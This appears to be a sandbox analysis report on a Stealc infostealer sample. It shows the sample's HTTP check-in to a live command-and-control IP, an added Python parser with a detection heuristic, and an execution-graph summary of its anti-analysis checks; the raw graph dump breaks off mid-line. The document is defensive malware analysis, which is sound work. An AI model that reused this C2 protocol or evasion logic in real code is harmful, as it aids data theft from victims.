Sep 30, 2024 00:30:10.024296045 CEST | 49700 | 80 | 192.168.2.7 | 185.215.113.37
Sep 30, 2024 00:30:10.029081106 CEST | 80 | 49700 | 185.215.113.37 | 192.168.2.7
Sep 30, 2024 00:30:10.742758036 CEST | 80 | 49700 | 185.215.113.37 | 192.168.2.7
Sep 30, 2024 00:30:10.742825031 CEST | 49700 | 80 | 192.168.2.7 | 185.215.113.37
Sep 30, 2024 00:30:11.829349995 CEST | 49700 | 80 | 192.168.2.7 | 185.215.113.37
Sep 30, 2024 00:30:11.835004091 CEST | 80 | 49700 | 185.215.113.37 | 192.168.2.7
Sep 30, 2024 00:30:12.065160990 CEST | 80 | 49700 | 185.215.113.37 | 192.168.2.7
Sep 30, 2024 00:30:12.065256119 CEST | 49700 | 80 | 192.168.2.7 | 185.215.113.37
Sep 30, 2024 00:30:16.455998898 CEST | 49700 | 80 | 192.168.2.7 | 185.215.113.37
HTTP sessions with 185.215.113.37 (Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process):
0 | 192.168.2.7 | 49700 | 185.215.113.37 | 80 | 5740 | C:\Users\user\Desktop\file.exe
HTTP exchange (Timestamp | Bytes transferred | Direction | Data):
Sep 30, 2024 00:30:10.024296045 CEST | 89 | OUT:
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Sep 30, 2024 00:30:10.742758036 CEST | 203 | IN:
HTTP/1.1 200 OK
Date: Sun, 29 Sep 2024 22:30:10 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Sep 30, 2024 00:30:11.829349995 CEST | 412 | OUT:
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCA
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 37 35 35 39 37 32 46 38 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 2d 2d 0d 0a
Data Ascii (line breaks restored from the CRLFs in the raw bytes; the 211 bytes match the Content-Length header):
------BAFCGIJDAFBKFIECBGCA
Content-Disposition: form-data; name="hwid"

B0755972F8951117388365
------BAFCGIJDAFBKFIECBGCA
Content-Disposition: form-data; name="build"

doma
------BAFCGIJDAFBKFIECBGCA--
Sep 30, 2024 00:30:12.065160990 CEST | 210 | IN:
HTTP/1.1 200 OK
Date: Sun, 29 Sep 2024 22:30:11 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64 for the ASCII string "block"; the capture shows no further HTTP requests after this reply)
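The check-in above, reparsed as an added example that is not part of the report: the request and response bodies are copied from the two Data Raw dumps, the parser splits the multipart body on its boundary, and a matcher flags the shape seen in this capture, a multipart POST to a 16-hex-character .php path whose form carries exactly the fields hwid and build. That matcher is a heuristic written for this example from this one capture; it is not the content of Suricata rule 2044243, which is not reproduced here.

```python
"""Parse the captured Stealc check-in and decode the server reply.
Added example, not part of the Joe Sandbox report. The bytes below are copied from
the report's Data Raw dumps; the detection heuristic is derived from this capture only."""
import base64
import re

CHECKIN_CONTENT_TYPE = "multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCA"
CHECKIN_BODY = bytes.fromhex(
    "2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a "
    "42 30 37 35 35 39 37 32 46 38 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a "
    "2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a "
    "64 6f 6d 61 0d 0a "
    "2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 2d 2d 0d 0a"
)
RESPONSE_BODY = bytes.fromhex("59 6d 78 76 59 32 73 3d")

CHECKIN_PATH = re.compile(r"^/[0-9a-f]{16}\.php$")


def parse_multipart(body: bytes, content_type: str) -> dict:
    """Return {field name: raw value} for a multipart/form-data body (RFC 7578 framing)."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("Content-Type carries no boundary")
    delimiter = b"--" + m.group(2).encode("ascii")
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):            # "--" right after the delimiter closes the body
            break
        if part.startswith(b"\r\n"):
            part = part[2:]
        headers, sep, value = part.partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("malformed part: no blank line between headers and value")
        name = re.search(rb'name="([^"]*)"', headers)
        if not name:
            raise ValueError("part without a form field name")
        fields[name.group(1).decode("ascii")] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def looks_like_stealc_checkin(method: str, path: str, content_type: str, body: bytes) -> bool:
    """Heuristic from this capture: multipart POST to /<16 hex>.php carrying exactly hwid and build."""
    if method != "POST" or not CHECKIN_PATH.match(path):
        return False
    if not content_type.startswith("multipart/form-data"):
        return False
    try:
        fields = parse_multipart(body, content_type)
    except ValueError:
        return False
    return set(fields) == {"hwid", "build"}


def decode_response(body: bytes) -> str:
    """The server answers with a base64 token; strict decoding rejects anything else."""
    return base64.b64decode(body, validate=True).decode("ascii")


if __name__ == "__main__":
    print(parse_multipart(CHECKIN_BODY, CHECKIN_CONTENT_TYPE))
    print(looks_like_stealc_checkin("POST", "/e2b1563c6670f193.php", CHECKIN_CONTENT_TYPE, CHECKIN_BODY))
    print(decode_response(RESPONSE_BODY))
```

The preceding GET / with an empty 200 reply is the only other request in the session, so a detection keyed on this pattern should also tolerate that probe rather than expect the POST as the first request on the connection.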



Target ID: 1
Start time: 18:30:04
Start date: 29/09/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0xa50000 (relocated from the preferred base 0x400000, as DYNAMIC_BASE allows; the Yara hit at 0x00A51000 is the first section of this relocated image)
File size: 1'864'704 bytes
MD5 hash: 0079FD2131677B1D9EAB7228129B05C6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.1295074155.0000000005350000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true


                              Execution Graph

Execution Coverage: 8.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 10.1%
Total number of Nodes: 2000
Total number of Limit Nodes: 24
Execution graph: the node/edge dump is not reproduced here. The API call chains recoverable from it, in graph order: a PEB read followed by five LoadLibraryA calls and a run of GetProcAddress calls; lstrcpy; a check routine at a511d0 whose stages (an initial test, GetSystemInfo, GetCurrentProcess with VirtualAllocExNuma, VirtualAlloc followed by an __aulldiv computation, and GetUserDefaultLangID) each branch to ExitProcess, the block after GetUserDefaultLangID fanning out to five separate ExitProcess blocks; GetProcessHeap, RtlAllocateHeap, GetUserNameA and GetComputerNameA; lstrlen, lstrcpy and lstrcat string building; OpenEventA, then either CreateEventA or CloseHandle and Sleep; GetSystemTime, sscanf and two SystemTimeToFileTime calls with a further branch to ExitProcess; and GetWindowsDirectoryA.
a51590 lstrcpy 13768->13769 13770 a65eb5 13769->13770 14997 a61a10 13770->14997 13772 a65eba 13773 a6a740 lstrcpy 13772->13773 13774 a65ed6 13773->13774 15341 a54fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13774->15341 13776 a65edb 13777 a51590 lstrcpy 13776->13777 13778 a65f5b 13777->13778 15348 a60740 13778->15348 13780 a65f60 13781 a6a740 lstrcpy 13780->13781 13782 a65f86 13781->13782 13783 a51590 lstrcpy 13782->13783 13784 a65f9a 13783->13784 13785 a55960 34 API calls 13784->13785 13786 a65fa0 13785->13786 13880 a545d1 RtlAllocateHeap 13879->13880 13883 a54621 VirtualProtect 13880->13883 13883->13528 13884->13615 13886 a510c2 ctype 13885->13886 13887 a510fd 13886->13887 13888 a510e2 VirtualFree 13886->13888 13887->13645 13888->13887 13890 a51233 GlobalMemoryStatusEx 13889->13890 13890->13650 13891->13672 13893 a6a7c2 13892->13893 13894 a6a7ec 13893->13894 13895 a6a7da lstrcpy 13893->13895 13894->13677 13895->13894 13897 a6a740 lstrcpy 13896->13897 13898 a66833 13897->13898 13899 a6a9b0 4 API calls 13898->13899 13900 a66845 13899->13900 13901 a6a8a0 lstrcpy 13900->13901 13902 a6684e 13901->13902 13903 a6a9b0 4 API calls 13902->13903 13904 a66867 13903->13904 13905 a6a8a0 lstrcpy 13904->13905 13906 a66870 13905->13906 13907 a6a9b0 4 API calls 13906->13907 13908 a6688a 13907->13908 13909 a6a8a0 lstrcpy 13908->13909 13910 a66893 13909->13910 13911 a6a9b0 4 API calls 13910->13911 13912 a668ac 13911->13912 13913 a6a8a0 lstrcpy 13912->13913 13914 a668b5 13913->13914 13915 a6a9b0 4 API calls 13914->13915 13916 a668cf 13915->13916 13917 a6a8a0 lstrcpy 13916->13917 13918 a668d8 13917->13918 13919 a6a9b0 4 API calls 13918->13919 13920 a668f3 13919->13920 13921 a6a8a0 lstrcpy 13920->13921 13922 a668fc 13921->13922 13923 a6a7a0 lstrcpy 13922->13923 13924 a66910 13923->13924 13924->13684 13926 a6a812 13925->13926 13926->13687 13928 a6a83f 13927->13928 13929 a65b54 13928->13929 13930 a6a87b lstrcpy 13928->13930 13929->13697 13930->13929 13932 a6a8a0 lstrcpy 13931->13932 
13933 a66443 13932->13933 13934 a6a8a0 lstrcpy 13933->13934 13935 a66455 13934->13935 13936 a6a8a0 lstrcpy 13935->13936 13937 a66467 13936->13937 13938 a6a8a0 lstrcpy 13937->13938 13939 a65b86 13938->13939 13939->13703 13941 a545c0 2 API calls 13940->13941 13942 a526b4 13941->13942 13943 a545c0 2 API calls 13942->13943 13944 a526d7 13943->13944 13945 a545c0 2 API calls 13944->13945 13946 a526f0 13945->13946 13947 a545c0 2 API calls 13946->13947 13948 a52709 13947->13948 13949 a545c0 2 API calls 13948->13949 13950 a52736 13949->13950 13951 a545c0 2 API calls 13950->13951 13952 a5274f 13951->13952 13953 a545c0 2 API calls 13952->13953 13954 a52768 13953->13954 13955 a545c0 2 API calls 13954->13955 13956 a52795 13955->13956 13957 a545c0 2 API calls 13956->13957 13958 a527ae 13957->13958 13959 a545c0 2 API calls 13958->13959 13960 a527c7 13959->13960 13961 a545c0 2 API calls 13960->13961 13962 a527e0 13961->13962 13963 a545c0 2 API calls 13962->13963 13964 a527f9 13963->13964 13965 a545c0 2 API calls 13964->13965 13966 a52812 13965->13966 13967 a545c0 2 API calls 13966->13967 13968 a5282b 13967->13968 13969 a545c0 2 API calls 13968->13969 13970 a52844 13969->13970 13971 a545c0 2 API calls 13970->13971 13972 a5285d 13971->13972 13973 a545c0 2 API calls 13972->13973 13974 a52876 13973->13974 13975 a545c0 2 API calls 13974->13975 13976 a5288f 13975->13976 13977 a545c0 2 API calls 13976->13977 13978 a528a8 13977->13978 13979 a545c0 2 API calls 13978->13979 13980 a528c1 13979->13980 13981 a545c0 2 API calls 13980->13981 13982 a528da 13981->13982 13983 a545c0 2 API calls 13982->13983 13984 a528f3 13983->13984 13985 a545c0 2 API calls 13984->13985 13986 a5290c 13985->13986 13987 a545c0 2 API calls 13986->13987 13988 a52925 13987->13988 13989 a545c0 2 API calls 13988->13989 13990 a5293e 13989->13990 13991 a545c0 2 API calls 13990->13991 13992 a52957 13991->13992 13993 a545c0 2 API calls 13992->13993 13994 a52970 13993->13994 13995 a545c0 2 API calls 13994->13995 13996 a52989 
13995->13996 13997 a545c0 2 API calls 13996->13997 13998 a529a2 13997->13998 13999 a545c0 2 API calls 13998->13999 14000 a529bb 13999->14000 14001 a545c0 2 API calls 14000->14001 14002 a529d4 14001->14002 14003 a545c0 2 API calls 14002->14003 14004 a529ed 14003->14004 14005 a545c0 2 API calls 14004->14005 14006 a52a06 14005->14006 14007 a545c0 2 API calls 14006->14007 14008 a52a1f 14007->14008 14009 a545c0 2 API calls 14008->14009 14010 a52a38 14009->14010 14011 a545c0 2 API calls 14010->14011 14012 a52a51 14011->14012 14013 a545c0 2 API calls 14012->14013 14014 a52a6a 14013->14014 14015 a545c0 2 API calls 14014->14015 14016 a52a83 14015->14016 14017 a545c0 2 API calls 14016->14017 14018 a52a9c 14017->14018 14019 a545c0 2 API calls 14018->14019 14020 a52ab5 14019->14020 14021 a545c0 2 API calls 14020->14021 14022 a52ace 14021->14022 14023 a545c0 2 API calls 14022->14023 14024 a52ae7 14023->14024 14025 a545c0 2 API calls 14024->14025 14026 a52b00 14025->14026 14027 a545c0 2 API calls 14026->14027 14028 a52b19 14027->14028 14029 a545c0 2 API calls 14028->14029 14030 a52b32 14029->14030 14031 a545c0 2 API calls 14030->14031 14032 a52b4b 14031->14032 14033 a545c0 2 API calls 14032->14033 14034 a52b64 14033->14034 14035 a545c0 2 API calls 14034->14035 14036 a52b7d 14035->14036 14037 a545c0 2 API calls 14036->14037 14038 a52b96 14037->14038 14039 a545c0 2 API calls 14038->14039 14040 a52baf 14039->14040 14041 a545c0 2 API calls 14040->14041 14042 a52bc8 14041->14042 14043 a545c0 2 API calls 14042->14043 14044 a52be1 14043->14044 14045 a545c0 2 API calls 14044->14045 14046 a52bfa 14045->14046 14047 a545c0 2 API calls 14046->14047 14048 a52c13 14047->14048 14049 a545c0 2 API calls 14048->14049 14050 a52c2c 14049->14050 14051 a545c0 2 API calls 14050->14051 14052 a52c45 14051->14052 14053 a545c0 2 API calls 14052->14053 14054 a52c5e 14053->14054 14055 a545c0 2 API calls 14054->14055 14056 a52c77 14055->14056 14057 a545c0 2 API calls 14056->14057 14058 a52c90 14057->14058 
14059 a545c0 2 API calls 14058->14059 14060 a52ca9 14059->14060 14061 a545c0 2 API calls 14060->14061 14062 a52cc2 14061->14062 14063 a545c0 2 API calls 14062->14063 14064 a52cdb 14063->14064 14065 a545c0 2 API calls 14064->14065 14066 a52cf4 14065->14066 14067 a545c0 2 API calls 14066->14067 14068 a52d0d 14067->14068 14069 a545c0 2 API calls 14068->14069 14070 a52d26 14069->14070 14071 a545c0 2 API calls 14070->14071 14072 a52d3f 14071->14072 14073 a545c0 2 API calls 14072->14073 14074 a52d58 14073->14074 14075 a545c0 2 API calls 14074->14075 14076 a52d71 14075->14076 14077 a545c0 2 API calls 14076->14077 14078 a52d8a 14077->14078 14079 a545c0 2 API calls 14078->14079 14080 a52da3 14079->14080 14081 a545c0 2 API calls 14080->14081 14082 a52dbc 14081->14082 14083 a545c0 2 API calls 14082->14083 14084 a52dd5 14083->14084 14085 a545c0 2 API calls 14084->14085 14086 a52dee 14085->14086 14087 a545c0 2 API calls 14086->14087 14088 a52e07 14087->14088 14089 a545c0 2 API calls 14088->14089 14090 a52e20 14089->14090 14091 a545c0 2 API calls 14090->14091 14092 a52e39 14091->14092 14093 a545c0 2 API calls 14092->14093 14094 a52e52 14093->14094 14095 a545c0 2 API calls 14094->14095 14096 a52e6b 14095->14096 14097 a545c0 2 API calls 14096->14097 14098 a52e84 14097->14098 14099 a545c0 2 API calls 14098->14099 14100 a52e9d 14099->14100 14101 a545c0 2 API calls 14100->14101 14102 a52eb6 14101->14102 14103 a545c0 2 API calls 14102->14103 14104 a52ecf 14103->14104 14105 a545c0 2 API calls 14104->14105 14106 a52ee8 14105->14106 14107 a545c0 2 API calls 14106->14107 14108 a52f01 14107->14108 14109 a545c0 2 API calls 14108->14109 14110 a52f1a 14109->14110 14111 a545c0 2 API calls 14110->14111 14112 a52f33 14111->14112 14113 a545c0 2 API calls 14112->14113 14114 a52f4c 14113->14114 14115 a545c0 2 API calls 14114->14115 14116 a52f65 14115->14116 14117 a545c0 2 API calls 14116->14117 14118 a52f7e 14117->14118 14119 a545c0 2 API calls 14118->14119 14120 a52f97 14119->14120 14121 a545c0 2 
API calls 14120->14121 14122 a52fb0 14121->14122 14123 a545c0 2 API calls 14122->14123 14124 a52fc9 14123->14124 14125 a545c0 2 API calls 14124->14125 14126 a52fe2 14125->14126 14127 a545c0 2 API calls 14126->14127 14128 a52ffb 14127->14128 14129 a545c0 2 API calls 14128->14129 14130 a53014 14129->14130 14131 a545c0 2 API calls 14130->14131 14132 a5302d 14131->14132 14133 a545c0 2 API calls 14132->14133 14134 a53046 14133->14134 14135 a545c0 2 API calls 14134->14135 14136 a5305f 14135->14136 14137 a545c0 2 API calls 14136->14137 14138 a53078 14137->14138 14139 a545c0 2 API calls 14138->14139 14140 a53091 14139->14140 14141 a545c0 2 API calls 14140->14141 14142 a530aa 14141->14142 14143 a545c0 2 API calls 14142->14143 14144 a530c3 14143->14144 14145 a545c0 2 API calls 14144->14145 14146 a530dc 14145->14146 14147 a545c0 2 API calls 14146->14147 14148 a530f5 14147->14148 14149 a545c0 2 API calls 14148->14149 14150 a5310e 14149->14150 14151 a545c0 2 API calls 14150->14151 14152 a53127 14151->14152 14153 a545c0 2 API calls 14152->14153 14154 a53140 14153->14154 14155 a545c0 2 API calls 14154->14155 14156 a53159 14155->14156 14157 a545c0 2 API calls 14156->14157 14158 a53172 14157->14158 14159 a545c0 2 API calls 14158->14159 14160 a5318b 14159->14160 14161 a545c0 2 API calls 14160->14161 14162 a531a4 14161->14162 14163 a545c0 2 API calls 14162->14163 14164 a531bd 14163->14164 14165 a545c0 2 API calls 14164->14165 14166 a531d6 14165->14166 14167 a545c0 2 API calls 14166->14167 14168 a531ef 14167->14168 14169 a545c0 2 API calls 14168->14169 14170 a53208 14169->14170 14171 a545c0 2 API calls 14170->14171 14172 a53221 14171->14172 14173 a545c0 2 API calls 14172->14173 14174 a5323a 14173->14174 14175 a545c0 2 API calls 14174->14175 14176 a53253 14175->14176 14177 a545c0 2 API calls 14176->14177 14178 a5326c 14177->14178 14179 a545c0 2 API calls 14178->14179 14180 a53285 14179->14180 14181 a545c0 2 API calls 14180->14181 14182 a5329e 14181->14182 14183 a545c0 2 API calls 
14182->14183 14184 a532b7 14183->14184 14185 a545c0 2 API calls 14184->14185 14186 a532d0 14185->14186 14187 a545c0 2 API calls 14186->14187 14188 a532e9 14187->14188 14189 a545c0 2 API calls 14188->14189 14190 a53302 14189->14190 14191 a545c0 2 API calls 14190->14191 14192 a5331b 14191->14192 14193 a545c0 2 API calls 14192->14193 14194 a53334 14193->14194 14195 a545c0 2 API calls 14194->14195 14196 a5334d 14195->14196 14197 a545c0 2 API calls 14196->14197 14198 a53366 14197->14198 14199 a545c0 2 API calls 14198->14199 14200 a5337f 14199->14200 14201 a545c0 2 API calls 14200->14201 14202 a53398 14201->14202 14203 a545c0 2 API calls 14202->14203 14204 a533b1 14203->14204 14205 a545c0 2 API calls 14204->14205 14206 a533ca 14205->14206 14207 a545c0 2 API calls 14206->14207 14208 a533e3 14207->14208 14209 a545c0 2 API calls 14208->14209 14210 a533fc 14209->14210 14211 a545c0 2 API calls 14210->14211 14212 a53415 14211->14212 14213 a545c0 2 API calls 14212->14213 14214 a5342e 14213->14214 14215 a545c0 2 API calls 14214->14215 14216 a53447 14215->14216 14217 a545c0 2 API calls 14216->14217 14218 a53460 14217->14218 14219 a545c0 2 API calls 14218->14219 14220 a53479 14219->14220 14221 a545c0 2 API calls 14220->14221 14222 a53492 14221->14222 14223 a545c0 2 API calls 14222->14223 14224 a534ab 14223->14224 14225 a545c0 2 API calls 14224->14225 14226 a534c4 14225->14226 14227 a545c0 2 API calls 14226->14227 14228 a534dd 14227->14228 14229 a545c0 2 API calls 14228->14229 14230 a534f6 14229->14230 14231 a545c0 2 API calls 14230->14231 14232 a5350f 14231->14232 14233 a545c0 2 API calls 14232->14233 14234 a53528 14233->14234 14235 a545c0 2 API calls 14234->14235 14236 a53541 14235->14236 14237 a545c0 2 API calls 14236->14237 14238 a5355a 14237->14238 14239 a545c0 2 API calls 14238->14239 14240 a53573 14239->14240 14241 a545c0 2 API calls 14240->14241 14242 a5358c 14241->14242 14243 a545c0 2 API calls 14242->14243 14244 a535a5 14243->14244 14245 a545c0 2 API calls 14244->14245 
14246 a535be 14245->14246 14247 a545c0 2 API calls 14246->14247 14248 a535d7 14247->14248 14249 a545c0 2 API calls 14248->14249 14250 a535f0 14249->14250 14251 a545c0 2 API calls 14250->14251 14252 a53609 14251->14252 14253 a545c0 2 API calls 14252->14253 14254 a53622 14253->14254 14255 a545c0 2 API calls 14254->14255 14256 a5363b 14255->14256 14257 a545c0 2 API calls 14256->14257 14258 a53654 14257->14258 14259 a545c0 2 API calls 14258->14259 14260 a5366d 14259->14260 14261 a545c0 2 API calls 14260->14261 14262 a53686 14261->14262 14263 a545c0 2 API calls 14262->14263 14264 a5369f 14263->14264 14265 a545c0 2 API calls 14264->14265 14266 a536b8 14265->14266 14267 a545c0 2 API calls 14266->14267 14268 a536d1 14267->14268 14269 a545c0 2 API calls 14268->14269 14270 a536ea 14269->14270 14271 a545c0 2 API calls 14270->14271 14272 a53703 14271->14272 14273 a545c0 2 API calls 14272->14273 14274 a5371c 14273->14274 14275 a545c0 2 API calls 14274->14275 14276 a53735 14275->14276 14277 a545c0 2 API calls 14276->14277 14278 a5374e 14277->14278 14279 a545c0 2 API calls 14278->14279 14280 a53767 14279->14280 14281 a545c0 2 API calls 14280->14281 14282 a53780 14281->14282 14283 a545c0 2 API calls 14282->14283 14284 a53799 14283->14284 14285 a545c0 2 API calls 14284->14285 14286 a537b2 14285->14286 14287 a545c0 2 API calls 14286->14287 14288 a537cb 14287->14288 14289 a545c0 2 API calls 14288->14289 14290 a537e4 14289->14290 14291 a545c0 2 API calls 14290->14291 14292 a537fd 14291->14292 14293 a545c0 2 API calls 14292->14293 14294 a53816 14293->14294 14295 a545c0 2 API calls 14294->14295 14296 a5382f 14295->14296 14297 a545c0 2 API calls 14296->14297 14298 a53848 14297->14298 14299 a545c0 2 API calls 14298->14299 14300 a53861 14299->14300 14301 a545c0 2 API calls 14300->14301 14302 a5387a 14301->14302 14303 a545c0 2 API calls 14302->14303 14304 a53893 14303->14304 14305 a545c0 2 API calls 14304->14305 14306 a538ac 14305->14306 14307 a545c0 2 API calls 14306->14307 14308 a538c5 
14307->14308 14309 a545c0 2 API calls 14308->14309 14310 a538de 14309->14310 14311 a545c0 2 API calls 14310->14311 14312 a538f7 14311->14312 14313 a545c0 2 API calls 14312->14313 14314 a53910 14313->14314 14315 a545c0 2 API calls 14314->14315 14316 a53929 14315->14316 14317 a545c0 2 API calls 14316->14317 14318 a53942 14317->14318 14319 a545c0 2 API calls 14318->14319 14320 a5395b 14319->14320 14321 a545c0 2 API calls 14320->14321 14322 a53974 14321->14322 14323 a545c0 2 API calls 14322->14323 14324 a5398d 14323->14324 14325 a545c0 2 API calls 14324->14325 14326 a539a6 14325->14326 14327 a545c0 2 API calls 14326->14327 14328 a539bf 14327->14328 14329 a545c0 2 API calls 14328->14329 14330 a539d8 14329->14330 14331 a545c0 2 API calls 14330->14331 14332 a539f1 14331->14332 14333 a545c0 2 API calls 14332->14333 14334 a53a0a 14333->14334 14335 a545c0 2 API calls 14334->14335 14336 a53a23 14335->14336 14337 a545c0 2 API calls 14336->14337 14338 a53a3c 14337->14338 14339 a545c0 2 API calls 14338->14339 14340 a53a55 14339->14340 14341 a545c0 2 API calls 14340->14341 14342 a53a6e 14341->14342 14343 a545c0 2 API calls 14342->14343 14344 a53a87 14343->14344 14345 a545c0 2 API calls 14344->14345 14346 a53aa0 14345->14346 14347 a545c0 2 API calls 14346->14347 14348 a53ab9 14347->14348 14349 a545c0 2 API calls 14348->14349 14350 a53ad2 14349->14350 14351 a545c0 2 API calls 14350->14351 14352 a53aeb 14351->14352 14353 a545c0 2 API calls 14352->14353 14354 a53b04 14353->14354 14355 a545c0 2 API calls 14354->14355 14356 a53b1d 14355->14356 14357 a545c0 2 API calls 14356->14357 14358 a53b36 14357->14358 14359 a545c0 2 API calls 14358->14359 14360 a53b4f 14359->14360 14361 a545c0 2 API calls 14360->14361 14362 a53b68 14361->14362 14363 a545c0 2 API calls 14362->14363 14364 a53b81 14363->14364 14365 a545c0 2 API calls 14364->14365 14366 a53b9a 14365->14366 14367 a545c0 2 API calls 14366->14367 14368 a53bb3 14367->14368 14369 a545c0 2 API calls 14368->14369 14370 a53bcc 14369->14370 
14371 a545c0 2 API calls 14370->14371 14372 a53be5 14371->14372 14373 a545c0 2 API calls 14372->14373 14374 a53bfe 14373->14374 14375 a545c0 2 API calls 14374->14375 14376 a53c17 14375->14376 14377 a545c0 2 API calls 14376->14377 14378 a53c30 14377->14378 14379 a545c0 2 API calls 14378->14379 14380 a53c49 14379->14380 14381 a545c0 2 API calls 14380->14381 14382 a53c62 14381->14382 14383 a545c0 2 API calls 14382->14383 14384 a53c7b 14383->14384 14385 a545c0 2 API calls 14384->14385 14386 a53c94 14385->14386 14387 a545c0 2 API calls 14386->14387 14388 a53cad 14387->14388 14389 a545c0 2 API calls 14388->14389 14390 a53cc6 14389->14390 14391 a545c0 2 API calls 14390->14391 14392 a53cdf 14391->14392 14393 a545c0 2 API calls 14392->14393 14394 a53cf8 14393->14394 14395 a545c0 2 API calls 14394->14395 14396 a53d11 14395->14396 14397 a545c0 2 API calls 14396->14397 14398 a53d2a 14397->14398 14399 a545c0 2 API calls 14398->14399 14400 a53d43 14399->14400 14401 a545c0 2 API calls 14400->14401 14402 a53d5c 14401->14402 14403 a545c0 2 API calls 14402->14403 14404 a53d75 14403->14404 14405 a545c0 2 API calls 14404->14405 14406 a53d8e 14405->14406 14407 a545c0 2 API calls 14406->14407 14408 a53da7 14407->14408 14409 a545c0 2 API calls 14408->14409 14410 a53dc0 14409->14410 14411 a545c0 2 API calls 14410->14411 14412 a53dd9 14411->14412 14413 a545c0 2 API calls 14412->14413 14414 a53df2 14413->14414 14415 a545c0 2 API calls 14414->14415 14416 a53e0b 14415->14416 14417 a545c0 2 API calls 14416->14417 14418 a53e24 14417->14418 14419 a545c0 2 API calls 14418->14419 14420 a53e3d 14419->14420 14421 a545c0 2 API calls 14420->14421 14422 a53e56 14421->14422 14423 a545c0 2 API calls 14422->14423 14424 a53e6f 14423->14424 14425 a545c0 2 API calls 14424->14425 14426 a53e88 14425->14426 14427 a545c0 2 API calls 14426->14427 14428 a53ea1 14427->14428 14429 a545c0 2 API calls 14428->14429 14430 a53eba 14429->14430 14431 a545c0 2 API calls 14430->14431 14432 a53ed3 14431->14432 14433 a545c0 2 
API calls 14432->14433 14434 a53eec 14433->14434 14435 a545c0 2 API calls 14434->14435 14436 a53f05 14435->14436 14437 a545c0 2 API calls 14436->14437 14438 a53f1e 14437->14438 14439 a545c0 2 API calls 14438->14439 14440 a53f37 14439->14440 14441 a545c0 2 API calls 14440->14441 14442 a53f50 14441->14442 14443 a545c0 2 API calls 14442->14443 14444 a53f69 14443->14444 14445 a545c0 2 API calls 14444->14445 14446 a53f82 14445->14446 14447 a545c0 2 API calls 14446->14447 14448 a53f9b 14447->14448 14449 a545c0 2 API calls 14448->14449 14450 a53fb4 14449->14450 14451 a545c0 2 API calls 14450->14451 14452 a53fcd 14451->14452 14453 a545c0 2 API calls 14452->14453 14454 a53fe6 14453->14454 14455 a545c0 2 API calls 14454->14455 14456 a53fff 14455->14456 14457 a545c0 2 API calls 14456->14457 14458 a54018 14457->14458 14459 a545c0 2 API calls 14458->14459 14460 a54031 14459->14460 14461 a545c0 2 API calls 14460->14461 14462 a5404a 14461->14462 14463 a545c0 2 API calls 14462->14463 14464 a54063 14463->14464 14465 a545c0 2 API calls 14464->14465 14466 a5407c 14465->14466 14467 a545c0 2 API calls 14466->14467 14468 a54095 14467->14468 14469 a545c0 2 API calls 14468->14469 14470 a540ae 14469->14470 14471 a545c0 2 API calls 14470->14471 14472 a540c7 14471->14472 14473 a545c0 2 API calls 14472->14473 14474 a540e0 14473->14474 14475 a545c0 2 API calls 14474->14475 14476 a540f9 14475->14476 14477 a545c0 2 